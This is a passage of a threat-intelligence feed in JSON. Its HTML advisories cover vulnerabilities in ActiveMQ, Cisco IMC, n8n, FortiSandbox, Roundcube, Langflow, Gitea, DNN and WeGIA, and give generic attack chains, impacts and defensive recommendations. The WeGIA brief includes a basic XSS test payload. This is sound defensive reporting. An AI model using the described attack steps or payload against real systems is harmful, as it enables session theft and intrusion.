attacker gains valid credentials to access the ActiveMQ management console or API, potentially through credential stuffing, phishing, or exploiting other vulnerabilities.\u003c/li\u003e\n\u003cli\u003eAuthentication: The attacker authenticates to the ActiveMQ instance using the compromised credentials.\u003c/li\u003e\n\u003cli\u003eVulnerability Exploitation (RCE): The attacker exploits a deserialization or other RCE vulnerability to inject malicious code into the ActiveMQ server. This may involve crafting a specific message or request to trigger the vulnerability.\u003c/li\u003e\n\u003cli\u003eCode Execution: The injected code executes within the context of the ActiveMQ server process, granting the attacker control over the system.\u003c/li\u003e\n\u003cli\u003ePrivilege Escalation (if necessary): The attacker attempts to escalate privileges to gain root or system-level access, depending on the initial privileges of the ActiveMQ process.\u003c/li\u003e\n\u003cli\u003eLateral Movement: The attacker uses the compromised ActiveMQ server as a pivot point to move laterally within the network, targeting other systems and resources.\u003c/li\u003e\n\u003cli\u003eVulnerability Exploitation (XSS): Simultaneously or independently, the attacker exploits an XSS vulnerability within the ActiveMQ web console. This may involve injecting malicious JavaScript code into the console.\u003c/li\u003e\n\u003cli\u003eImpact: The attacker deploys ransomware, exfiltrates sensitive data, or disrupts critical services, depending on their objectives. The XSS vulnerability allows the attacker to steal administrator cookies or inject further malicious content.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation of these vulnerabilities could lead to complete compromise of the ActiveMQ server, potentially affecting all connected systems and applications. The lack of specifics makes it difficult to determine the exact number of potential victims; however, given the widespread use of ActiveMQ in enterprise environments, the impact could be significant. Consequences include data breaches, service disruption, financial loss, and reputational damage. The combination of RCE and XSS vulnerabilities allows attackers to pursue a wide range of malicious objectives, from data theft to system destruction.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eIdentify all Apache ActiveMQ instances within your environment and determine their versions.\u003c/li\u003e\n\u003cli\u003eConsult the Apache ActiveMQ security advisories to identify specific vulnerabilities affecting your versions and apply the necessary patches.\u003c/li\u003e\n\u003cli\u003eImplement strong authentication and authorization controls to restrict access to the ActiveMQ management console and API.\u003c/li\u003e\n\u003cli\u003eDeploy the Sigma rule to detect potential exploitation attempts against ActiveMQ instances.\u003c/li\u003e\n\u003cli\u003eReview and harden the ActiveMQ configuration to minimize the attack surface and reduce the risk of exploitation.\u003c/li\u003e\n\u003cli\u003eImplement network segmentation to limit the impact of a successful compromise of an ActiveMQ instance.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-04-24T09:09:10Z","date_published":"2026-04-24T09:09:10Z","id":"/briefs/2026-04-activemq-rce-xss/","summary":"An authenticated remote attacker can exploit multiple vulnerabilities in Apache ActiveMQ to execute arbitrary program code or perform cross-site scripting attacks.","title":"Apache ActiveMQ Vulnerabilities Allow RCE and XSS","url":"https://feed.craftedsignal.io/briefs/2026-04-activemq-rce-xss/"},{"_cs_actors":[],"_cs_cves":[{"cvss":6.1,"id":"CVE-2026-20085"},{"cvss":4.8,"id":"CVE-2026-20087"},{"cvss":4.8,"id":"CVE-2026-20088"},{"cvss":4.8,"id":"CVE-2026-20089"},{"cvss":4.8,"id":"CVE-2026-20090"}],"_cs_exploited":false,"_cs_products":["Integrated Management Controller"],"_cs_severities":["medium"],"_cs_tags":["xss","cisco","cimc","vulnerability"],"_cs_type":"advisory","_cs_vendors":["Cisco"],"content_html":"\u003cp\u003eMultiple cross-site scripting (XSS) vulnerabilities have been identified in the web-based management interface of the Cisco Integrated Management Controller (IMC). Successful exploitation of these vulnerabilities could allow a remote attacker to inject malicious scripts into the web browser of a user accessing the IMC interface. This could lead to session hijacking, sensitive information disclosure, or other malicious activities performed in the context of the user\u0026rsquo;s session. The vulnerabilities were disclosed on 2026-04-22, and Cisco has released software updates to address them. There are no known workarounds. This threat is relevant for organizations using Cisco IMC to manage their infrastructure.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAttacker identifies a vulnerable Cisco IMC web interface.\u003c/li\u003e\n\u003cli\u003eAttacker crafts a malicious URL containing a JavaScript payload designed to execute in the context of a victim\u0026rsquo;s browser session.\u003c/li\u003e\n\u003cli\u003eAttacker delivers the malicious URL to the victim, typically through phishing, social engineering, or by injecting it into a trusted website.\u003c/li\u003e\n\u003cli\u003eVictim clicks on the malicious URL, or the URL is automatically loaded through a compromised website.\u003c/li\u003e\n\u003cli\u003eThe victim\u0026rsquo;s web browser sends an HTTP request to the vulnerable Cisco IMC web server.\u003c/li\u003e\n\u003cli\u003eThe Cisco IMC web server reflects the attacker\u0026rsquo;s malicious JavaScript payload in the HTTP response without proper sanitization.\u003c/li\u003e\n\u003cli\u003eThe victim\u0026rsquo;s web browser executes the malicious JavaScript code.\u003c/li\u003e\n\u003cli\u003eThe attacker\u0026rsquo;s JavaScript code executes within the victim\u0026rsquo;s browser, allowing the attacker to steal cookies, redirect the user, or perform other actions on behalf of the victim.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation of these XSS vulnerabilities could allow an attacker to execute arbitrary JavaScript code in the context of a user\u0026rsquo;s session. This could lead to sensitive information disclosure, such as the theft of session cookies, allowing the attacker to hijack the user\u0026rsquo;s session and gain unauthorized access to the Cisco IMC. The attacker could also redirect the user to a malicious website or deface the IMC web interface. While the specific number of vulnerable systems is unknown, organizations using Cisco IMC are potentially at risk.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eApply the software updates released by Cisco to address the vulnerabilities (CVE-2026-20085, CVE-2026-20087, CVE-2026-20088, CVE-2026-20089, CVE-2026-20090).\u003c/li\u003e\n\u003cli\u003eDeploy the Sigma rule provided below to detect potential exploitation attempts against the Cisco IMC web interface.\u003c/li\u003e\n\u003cli\u003eMonitor web server logs for suspicious HTTP requests containing potentially malicious JavaScript payloads targeting the Cisco IMC web interface.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-04-23T12:00:00Z","date_published":"2026-04-23T12:00:00Z","id":"/briefs/2026-04-cisco-imc-xss/","summary":"Multiple cross-site scripting (XSS) vulnerabilities in the web-based management interface of Cisco Integrated Management Controller (IMC) could allow a remote attacker to conduct an XSS attack against a user of the interface.","title":"Cisco Integrated Management Controller (IMC) Multiple XSS Vulnerabilities","url":"https://feed.craftedsignal.io/briefs/2026-04-cisco-imc-xss/"},{"_cs_actors":[],"_cs_cves":[{"cvss":8.5,"id":"CVE-2026-39974"}],"_cs_exploited":false,"_cs_products":["n8n"],"_cs_severities":["critical"],"_cs_tags":["n8n","vulnerability","sqli","xss","rce","session-hijacking"],"_cs_type":"advisory","_cs_vendors":["n8n"],"content_html":"\u003cp\u003eMultiple vulnerabilities have been identified in n8n, a workflow automation tool. An attacker exploiting these vulnerabilities could achieve a range of malicious outcomes, including remote code execution, security bypass, information disclosure, SQL injection, denial-of-service, cross-site scripting (XSS), malicious redirection, and session hijacking. The vulnerabilities stem from insufficient input validation, insecure configurations, or design flaws within the n8n application. Successful exploitation can lead to complete compromise of the n8n instance and potentially the underlying system, depending on the permissions of the n8n process. This poses a significant risk to organizations relying on n8n for critical business processes. Defenders need to implement robust security measures to mitigate these risks.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003cp\u003eGiven the broad range of potential vulnerabilities, a generalized attack chain is outlined below:\u003c/p\u003e\n\u003col\u003e\n\u003cli\u003e\u003cstrong\u003eReconnaissance:\u003c/strong\u003e The attacker identifies a vulnerable n8n instance, potentially through Shodan or similar tools.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eVulnerability Identification:\u003c/strong\u003e The attacker probes the n8n instance to identify specific exploitable vulnerabilities, such as those related to SQL injection or XSS.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eExploitation (SQL Injection):\u003c/strong\u003e The attacker crafts malicious SQL queries through user input fields or API calls to extract sensitive data from the n8n database, such as user credentials or API keys.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eExploitation (XSS):\u003c/strong\u003e The attacker injects malicious JavaScript code into n8n workflows or data fields. When other users interact with the affected workflows or data, the JavaScript code executes in their browsers.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003ePrivilege Escalation/Lateral Movement:\u003c/strong\u003e The attacker leverages the compromised credentials or XSS vulnerabilities to gain elevated privileges within the n8n instance or move laterally to other systems within the network.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eRemote Code Execution:\u003c/strong\u003e The attacker exploits a vulnerability that allows for the execution of arbitrary code on the server. This could be achieved through insecure file uploads, deserialization flaws, or command injection.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003ePersistence:\u003c/strong\u003e The attacker establishes persistence by creating new n8n workflows or modifying existing ones to execute malicious code on a recurring basis.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eImpact:\u003c/strong\u003e The attacker exfiltrates sensitive data, disrupts critical business processes by manipulating or deleting workflows, or uses the compromised system as a foothold for further attacks within the network.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation of these vulnerabilities could result in significant damage, depending on the attacker\u0026rsquo;s objectives. The potential impact includes data breaches, financial losses, service disruptions, and reputational damage. If sensitive data is exfiltrated, it could be used for identity theft, fraud, or other malicious purposes. Disruption of critical workflows can lead to business downtime and lost productivity. The lack of specific victim counts or sector targeting in the source data makes it difficult to quantify the impact precisely, but the broad range of potential vulnerabilities and their potential consequences warrant immediate attention.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eImplement the provided Sigma rules to detect potential exploitation attempts targeting n8n instances (see \u0026ldquo;Descriptive Detection Rule Name\u0026rdquo; in the \u003ccode\u003erules\u003c/code\u003e section).\u003c/li\u003e\n\u003cli\u003eConduct regular security audits and penetration testing of n8n instances to identify and remediate vulnerabilities before they can be exploited.\u003c/li\u003e\n\u003cli\u003eEnforce strict input validation and sanitization measures to prevent SQL injection and XSS attacks.\u003c/li\u003e\n\u003cli\u003eApply the principle of least privilege to limit the permissions of the n8n process and users.\u003c/li\u003e\n\u003cli\u003eMonitor network traffic for suspicious activity related to n8n instances, such as unusual API calls or connections to malicious domains.\u003c/li\u003e\n\u003cli\u003eRegularly review and update n8n workflows to ensure they are secure and do not contain any malicious code.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-04-23T10:23:56Z","date_published":"2026-04-23T10:23:56Z","id":"/briefs/2026-04-n8n-multiple-vulnerabilities/","summary":"Multiple vulnerabilities in n8n can be exploited by an attacker to execute arbitrary code, bypass security measures, disclose sensitive information, conduct SQL injection attacks, cause denial-of-service, perform cross-site scripting, redirect users, or hijack sessions.","title":"Multiple Vulnerabilities in n8n Workflow Automation Tool","url":"https://feed.craftedsignal.io/briefs/2026-04-n8n-multiple-vulnerabilities/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["high"],"_cs_tags":["fortinet","fortisandbox","vulnerability","xss","code-execution"],"_cs_type":"advisory","_cs_vendors":[],"content_html":"\u003cp\u003eFortinet FortiSandbox is susceptible to multiple vulnerabilities that could allow a malicious actor to compromise the system. While the specific CVEs and affected versions are not detailed in the source, the vulnerabilities enable a range of attacks including Cross-Site Scripting (XSS), information disclosure, security bypass, and ultimately, arbitrary code execution. Successful exploitation could allow attackers to gain unauthorized access, steal sensitive data, or disrupt services. Defenders should promptly investigate and patch their FortiSandbox deployments.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003cp\u003eGiven the general nature of the vulnerabilities, a likely attack chain could involve the following steps:\u003c/p\u003e\n\u003col\u003e\n\u003cli\u003e\u003cstrong\u003eReconnaissance:\u003c/strong\u003e Attacker identifies a vulnerable FortiSandbox instance exposed to the network.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eXSS Exploitation:\u003c/strong\u003e Attacker crafts a malicious request containing XSS payload targeting a FortiSandbox web interface.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eInformation Disclosure:\u003c/strong\u003e Attacker leverages an information disclosure vulnerability to leak sensitive configuration data or credentials.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eSecurity Bypass:\u003c/strong\u003e Attacker circumvents security controls or authentication mechanisms due to a flaw in the FortiSandbox.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eCode Execution:\u003c/strong\u003e Attacker exploits a code execution vulnerability to inject and execute arbitrary commands on the system.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003ePrivilege Escalation:\u003c/strong\u003e If necessary, the attacker escalates privileges to gain root or administrator access.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eLateral Movement:\u003c/strong\u003e The attacker uses the compromised FortiSandbox as a pivot point to move laterally within the network.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eImpact:\u003c/strong\u003e Depending on the attacker\u0026rsquo;s objectives, the final impact may include data exfiltration, system disruption, or further compromise of internal systems.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation of these vulnerabilities could lead to complete compromise of the FortiSandbox appliance, potentially impacting network security monitoring and incident response capabilities. An attacker could gain unauthorized access to sensitive data, disrupt security services, or use the compromised FortiSandbox as a launchpad for further attacks within the network. The impact is significant due to the FortiSandbox\u0026rsquo;s role in analyzing and mitigating threats.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eInvestigate Fortinet\u0026rsquo;s official security advisories for FortiSandbox to identify specific CVEs and affected versions related to these vulnerabilities.\u003c/li\u003e\n\u003cli\u003eApply any available patches or workarounds provided by Fortinet to mitigate the identified vulnerabilities.\u003c/li\u003e\n\u003cli\u003eMonitor web server logs on the FortiSandbox for suspicious activity, such as unusual HTTP requests or attempts to access sensitive files (reference: webserver log source in Sigma rules).\u003c/li\u003e\n\u003cli\u003eImplement network segmentation to limit the potential impact of a compromised FortiSandbox instance (reference: network_connection log source).\u003c/li\u003e\n\u003cli\u003eDeploy the Sigma rules in this brief to your SIEM and tune for your environment to detect exploitation attempts.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-04-21T10:00:00Z","date_published":"2026-04-21T10:00:00Z","id":"/briefs/2026-04-fortinet-fortisandbox-vulns/","summary":"Multiple vulnerabilities in Fortinet FortiSandbox allow attackers to perform cross-site scripting attacks, disclose information, bypass security measures, and execute arbitrary code, potentially leading to system compromise.","title":"Multiple Vulnerabilities in Fortinet FortiSandbox","url":"https://feed.craftedsignal.io/briefs/2026-04-fortinet-fortisandbox-vulns/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["high"],"_cs_tags":["roundcube","vulnerability","xss","file-manipulation"],"_cs_type":"advisory","_cs_vendors":[],"content_html":"\u003cp\u003eRoundcube is a widely used, open-source webmail solution. The BSI advisory highlights multiple vulnerabilities within Roundcube that can be exploited by an attacker. These vulnerabilities allow for file manipulation, security bypass, cross-site scripting (XSS) attacks, and information disclosure. While the specific versions affected are not detailed, administrators are urged to investigate and apply necessary patches. Successful exploitation could lead to unauthorized access to sensitive email data, compromise of user accounts, and potential further attacks within the affected infrastructure. The advisory was published on 2026-04-21, emphasizing the timeliness of the threat.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eThe attacker identifies a vulnerable Roundcube instance through scanning or reconnaissance.\u003c/li\u003e\n\u003cli\u003eThe attacker leverages a file manipulation vulnerability to upload a malicious file (e.g., a PHP script) to a Roundcube-accessible directory.\u003c/li\u003e\n\u003cli\u003eThe attacker bypasses security measures implemented within Roundcube to prevent unauthorized file access or execution.\u003c/li\u003e\n\u003cli\u003eThe attacker exploits a cross-site scripting (XSS) vulnerability by injecting malicious JavaScript code into a Roundcube page.\u003c/li\u003e\n\u003cli\u003eA legitimate user accesses the compromised page, triggering the injected JavaScript.\u003c/li\u003e\n\u003cli\u003eThe malicious JavaScript executes in the user\u0026rsquo;s browser, potentially stealing cookies or redirecting the user to a phishing site.\u003c/li\u003e\n\u003cli\u003eThe attacker exploits an information disclosure vulnerability to gain access to sensitive information such as user credentials or internal system details.\u003c/li\u003e\n\u003cli\u003eUsing the gathered information, the attacker elevates privileges or gains unauthorized access to other systems.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation of these Roundcube vulnerabilities could lead to a range of damaging outcomes. Attackers could gain unauthorized access to sensitive email communications, potentially exposing confidential business information or personal data. Compromised user accounts could be used for further attacks, such as sending phishing emails or gaining access to other internal systems. XSS attacks could lead to credential theft and account takeover. Information disclosure could reveal sensitive system details, aiding in further exploitation. The number of affected organizations is currently unknown, but any organization using a vulnerable Roundcube instance is at risk.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eInspect Roundcube webserver logs for suspicious file uploads and access attempts, focusing on unusual file extensions or directory traversals. Use the \u003ccode\u003eRoundcube File Upload\u003c/code\u003e Sigma rule as a starting point.\u003c/li\u003e\n\u003cli\u003eImplement a Web Application Firewall (WAF) to filter malicious requests and prevent XSS attacks.\u003c/li\u003e\n\u003cli\u003eMonitor Roundcube logs for unusual activity, such as unexpected access to sensitive files or directories.\u003c/li\u003e\n\u003cli\u003eReview and harden Roundcube\u0026rsquo;s security configuration, including disabling unnecessary features and enforcing strong password policies.\u003c/li\u003e\n\u003cli\u003eDeploy the \u003ccode\u003eRoundcube XSS Attempt\u003c/code\u003e Sigma rule to detect potential cross-site scripting attacks targeting Roundcube.\u003c/li\u003e\n\u003cli\u003eEnable verbose logging for the web server hosting Roundcube to capture detailed information about requests and responses.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-04-21T08:06:54Z","date_published":"2026-04-21T08:06:54Z","id":"/briefs/2026-04-roundcube-vulns/","summary":"Multiple vulnerabilities in Roundcube allow an attacker to manipulate files, bypass security measures, perform cross-site scripting attacks, and disclose information.","title":"Multiple Vulnerabilities in Roundcube","url":"https://feed.craftedsignal.io/briefs/2026-04-roundcube-vulns/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["medium"],"_cs_tags":["langflow","vulnerability","xss","file-manipulation","information-disclosure"],"_cs_type":"advisory","_cs_vendors":[],"content_html":"\u003cp\u003eLangflow is affected by multiple vulnerabilities that could allow attackers to perform malicious actions. While specific details such as CVEs and exploited versions are not provided, the identified vulnerabilities enable attackers to manipulate files, potentially leading to data corruption or unauthorized modifications. The disclosure of sensitive information is another significant risk, potentially exposing credentials or other confidential data. Finally, the possibility of Cross-Site Scripting (XSS) attacks could allow attackers to inject malicious scripts into the Langflow application, affecting user sessions and potentially leading to account compromise.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAttacker identifies a Langflow instance running a vulnerable version.\u003c/li\u003e\n\u003cli\u003eAttacker exploits a file manipulation vulnerability to modify application files.\u003c/li\u003e\n\u003cli\u003eMalicious code injected alters application behavior.\u003c/li\u003e\n\u003cli\u003eAttacker exploits a separate vulnerability to access sensitive configuration files.\u003c/li\u003e\n\u003cli\u003eAttacker gains access to credentials or API keys.\u003c/li\u003e\n\u003cli\u003eAttacker leverages XSS vulnerability to inject malicious JavaScript into a Langflow page.\u003c/li\u003e\n\u003cli\u003eVictim visits the compromised page, executing the attacker\u0026rsquo;s script.\u003c/li\u003e\n\u003cli\u003eAttacker steals user session cookies or redirects the victim to a phishing site.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation of these vulnerabilities could result in unauthorized file modifications, leading to application malfunction or data corruption. Sensitive information disclosure can lead to compromised credentials, allowing attackers to gain further access to systems and data. Cross-site scripting can lead to user account compromise, data theft, and further propagation of the attack. The number of affected Langflow instances is currently unknown.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eMonitor web server logs for suspicious activity related to file access and modification, focusing on unusual file paths or unexpected HTTP methods (see rule: \u0026ldquo;Langflow Suspicious File Access\u0026rdquo;).\u003c/li\u003e\n\u003cli\u003eImplement strict input validation and output encoding to mitigate the risk of Cross-Site Scripting (XSS) attacks (see rule: \u0026ldquo;Langflow Potential XSS Attempt\u0026rdquo;).\u003c/li\u003e\n\u003cli\u003eRegularly review and update Langflow installations to the latest versions to patch potential vulnerabilities.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-04-20T10:38:57Z","date_published":"2026-04-20T10:38:57Z","id":"/briefs/2026-04-langflow-vulns/","summary":"Multiple vulnerabilities in Langflow allow an attacker to manipulate files, disclose sensitive information, or conduct cross-site scripting attacks.","title":"Langflow Multiple Vulnerabilities","url":"https://feed.craftedsignal.io/briefs/2026-04-langflow-vulns/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["medium"],"_cs_tags":["gitea","vulnerability","xss"],"_cs_type":"advisory","_cs_vendors":[],"content_html":"\u003cp\u003eMultiple vulnerabilities have been identified in Gitea, a self-hosted Git service. These vulnerabilities could be exploited by an attacker to achieve information disclosure, bypass security precautions implemented within the application, and execute cross-site scripting (XSS) attacks. Successful exploitation of these vulnerabilities could lead to unauthorized access to sensitive information stored within Gitea repositories, modification of code, or the execution of malicious scripts in the context of other users. The advisory was published on 2026-04-20.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAttacker identifies a vulnerable Gitea instance exposed to the internet.\u003c/li\u003e\n\u003cli\u003eAttacker leverages an information disclosure vulnerability to obtain sensitive data, such as internal configuration details or user information.\u003c/li\u003e\n\u003cli\u003eThe attacker exploits a security bypass vulnerability to circumvent authentication or authorization mechanisms.\u003c/li\u003e\n\u003cli\u003eAttacker gains unauthorized access to a repository.\u003c/li\u003e\n\u003cli\u003eThe attacker injects malicious JavaScript code into a Gitea page or repository via a cross-site scripting vulnerability.\u003c/li\u003e\n\u003cli\u003eA legitimate user visits the compromised page or interacts with the malicious code within the repository.\u003c/li\u003e\n\u003cli\u003eThe malicious JavaScript executes in the user\u0026rsquo;s browser, allowing the attacker to steal cookies, session tokens, or other sensitive information.\u003c/li\u003e\n\u003cli\u003eAttacker uses stolen credentials to further compromise the Gitea instance or related systems.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eThe exploitation of these vulnerabilities in Gitea could lead to the disclosure of sensitive information, such as source code, configuration files, and user credentials. The bypass of security measures could grant unauthorized access to repositories, allowing attackers to modify code or introduce malicious backdoors. Cross-site scripting attacks could compromise user accounts and lead to further attacks on other systems. The impact varies depending on the specific vulnerabilities exploited and the sensitivity of the data stored within the Gitea instance.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eDeploy the Sigma rule \u003ccode\u003eDetect Suspicious Gitea HTTP Requests\u003c/code\u003e to your web server logs to identify potential exploitation attempts (log source: webserver).\u003c/li\u003e\n\u003cli\u003eMonitor web server logs for unusual HTTP requests targeting Gitea instances, specifically looking for indicators of information disclosure or security bypass attempts (log source: webserver).\u003c/li\u003e\n\u003cli\u003eImplement a web application firewall (WAF) with rules to block known Gitea exploits and common XSS attack patterns.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-04-20T10:29:08Z","date_published":"2026-04-20T10:29:08Z","id":"/briefs/2026-04-gitea-vulns/","summary":"Multiple vulnerabilities in Gitea could allow an attacker to disclose information, bypass security measures, and perform cross-site scripting attacks.","title":"Multiple Vulnerabilities in Gitea","url":"https://feed.craftedsignal.io/briefs/2026-04-gitea-vulns/"},{"_cs_actors":[],"_cs_cves":[{"cvss":8,"id":"CVE-2026-40321"}],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["high"],"_cs_tags":["dnn","dotnetnuke","svg","xss","cve-2026-40321","upload"],"_cs_type":"advisory","_cs_vendors":[],"content_html":"\u003cp\u003eDNN (formerly DotNetNuke) is an open-source web content management system (CMS) built on the .NET framework. Prior to version 10.2.2, a stored cross-site scripting (XSS) vulnerability exists due to insufficient sanitization of SVG files. Attackers can exploit CVE-2026-40321 by uploading a crafted SVG file containing malicious JavaScript. This script can then be executed in the context of other users, including administrators, upon accessing the uploaded SVG. Successful exploitation could lead to session hijacking, account takeover, and potentially arbitrary code execution on the server. Version 10.2.2 addresses this vulnerability by implementing proper sanitization of SVG uploads. The vulnerability affects both authenticated and unauthenticated users, increasing the attack surface.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAn attacker identifies a DNN instance running a version prior to 10.2.2.\u003c/li\u003e\n\u003cli\u003eThe attacker crafts a malicious SVG file containing embedded JavaScript code designed to perform actions such as stealing cookies or redirecting users.\u003c/li\u003e\n\u003cli\u003eThe attacker uploads the malicious SVG file to the DNN instance, potentially through a media library or profile picture upload feature.\u003c/li\u003e\n\u003cli\u003eA user (either authenticated or unauthenticated) views the page or element where the malicious SVG is displayed.\u003c/li\u003e\n\u003cli\u003eThe user\u0026rsquo;s browser executes the embedded JavaScript code within the SVG file.\u003c/li\u003e\n\u003cli\u003eThe malicious script steals the user\u0026rsquo;s session cookie or redirects them to a phishing page.\u003c/li\u003e\n\u003cli\u003eIf the compromised user has administrative privileges, the attacker uses the stolen cookie to access the DNN administration panel.\u003c/li\u003e\n\u003cli\u003eThe attacker leverages their administrative access to inject malicious code into the DNN website or install a backdoor for persistent access.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation of this vulnerability (CVE-2026-40321) can lead to a range of negative consequences. Attackers can hijack user sessions, potentially gaining unauthorized access to sensitive data and administrative functions. An attacker can deface the website, inject malware, or steal sensitive information. Because DNN is often used in enterprise environments, this could lead to significant data breaches and reputational damage. The number of affected installations is potentially high, given the widespread use of DNN.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eUpgrade DNN installations to version 10.2.2 or later to patch CVE-2026-40321, as recommended by the vendor.\u003c/li\u003e\n\u003cli\u003eImplement the \u0026ldquo;Detect Suspicious SVG Uploads\u0026rdquo; Sigma rule to identify attempts to upload SVG files containing potentially malicious script content.\u003c/li\u003e\n\u003cli\u003eMonitor web server logs for HTTP requests with the \u0026ldquo;.svg\u0026rdquo; extension and inspect the request body for suspicious JavaScript patterns to proactively detect malicious SVG uploads using the \u0026ldquo;Web Server Suspicious SVG Upload\u0026rdquo; Sigma rule.\u003c/li\u003e\n\u003cli\u003eImplement strict input validation and sanitization measures for all file uploads, especially SVG files, to prevent the injection of malicious code.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-04-18T12:00:00Z","date_published":"2026-04-18T12:00:00Z","id":"/briefs/2026-04-dnn-svg-upload/","summary":"DNN (formerly DotNetNuke) before 10.2.2 is vulnerable to stored cross-site scripting (XSS) via malicious SVG file uploads, potentially leading to account takeover and arbitrary code execution.","title":"DNN (DotNetNuke) SVG Upload Vulnerability (CVE-2026-40321)","url":"https://feed.craftedsignal.io/briefs/2026-04-dnn-svg-upload/"},{"_cs_actors":[],"_cs_cves":[{"cvss":7.5,"id":"CVE-2026-40286"}],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["medium"],"_cs_tags":["xss","web-application","cve-2026-40286"],"_cs_type":"advisory","_cs_vendors":[],"content_html":"\u003cp\u003eWeGIA, a web manager for charitable institutions, is vulnerable to Stored Cross-Site Scripting (XSS) in versions prior to 3.6.10. The vulnerability, identified as CVE-2026-40286, resides in the \u0026lsquo;Member Registration\u0026rsquo; function, specifically the \u0026lsquo;Member Name\u0026rsquo; field. Attackers can inject malicious JavaScript code into this field. Because input is not properly validated and sanitized, the injected script is then stored in the application database.  Any user accessing the profile containing the malicious script will have the script executed in their browser.  This can lead to session hijacking, credential theft, or defacement. WeGIA version 3.6.10 addresses this vulnerability by implementing proper input sanitization. This vulnerability was reported on April 17, 2026.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAn attacker identifies a vulnerable WeGIA instance running a version prior to 3.6.10.\u003c/li\u003e\n\u003cli\u003eThe attacker accesses the \u0026lsquo;Member Registration\u0026rsquo; (Cadastrar Sócio) page.\u003c/li\u003e\n\u003cli\u003eIn the \u0026lsquo;Member Name\u0026rsquo; (Nome Sócio) field, the attacker injects a malicious JavaScript payload (e.g., \u003ccode\u003e\u0026lt;script\u0026gt;alert(\u0026quot;XSS\u0026quot;);\u0026lt;/script\u0026gt;\u003c/code\u003e).\u003c/li\u003e\n\u003cli\u003eThe attacker submits the registration 